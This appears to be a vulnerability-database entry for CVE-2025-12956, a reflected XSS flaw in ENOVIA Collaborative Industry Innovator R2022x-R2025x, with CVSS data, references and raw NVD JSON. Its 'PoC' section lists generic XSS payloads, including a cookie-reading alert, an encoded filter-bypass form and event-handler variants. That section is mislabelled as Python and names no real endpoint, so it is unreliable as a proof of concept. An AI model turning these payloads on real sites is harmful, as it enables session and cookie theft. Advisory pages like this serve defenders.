CVE-2025-12956

Description

A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:* - VULNERABLE

ENOVIA Collaborative Industry Innovator R2022x

ENOVIA Collaborative Industry Innovator R2023x

ENOVIA Collaborative Industry Innovator R2024x

ENOVIA Collaborative Industry Innovator R2025x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-12956 Reflected XSS PoC -->
<!-- Target: ENOVIA Collaborative Industry Innovator R2022x-R2025x -->

<!-- Basic XSS payload in URL parameter -->
<script>alert(document.cookie)</script>

<!-- Encoded version for bypassing filters -->
%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

<!-- Event handler payload -->
<img src=x onerror=alert(document.domain)>

<!-- SVG-based payload -->
<svg/onload=alert(document.cookie)>

<!-- Sample attack URL structure -->
<!-- https://[target-host]/[vulnerable-endpoint]?param=<script>alert(document.cookie)</script> -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12956/
[4] VulDB https://vuldb.com/cve/CVE-2025-12956
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12956", "sourceIdentifier": "[email protected]", "published": "2025-12-08T09:15:46.080", "lastModified": "2026-01-12T18:49:43.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2022x", "versionEndIncluding": "r2025x", "matchCriteriaId": "ED13CC58-ACBD-48A3-B370-528F7F8D3ABF"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}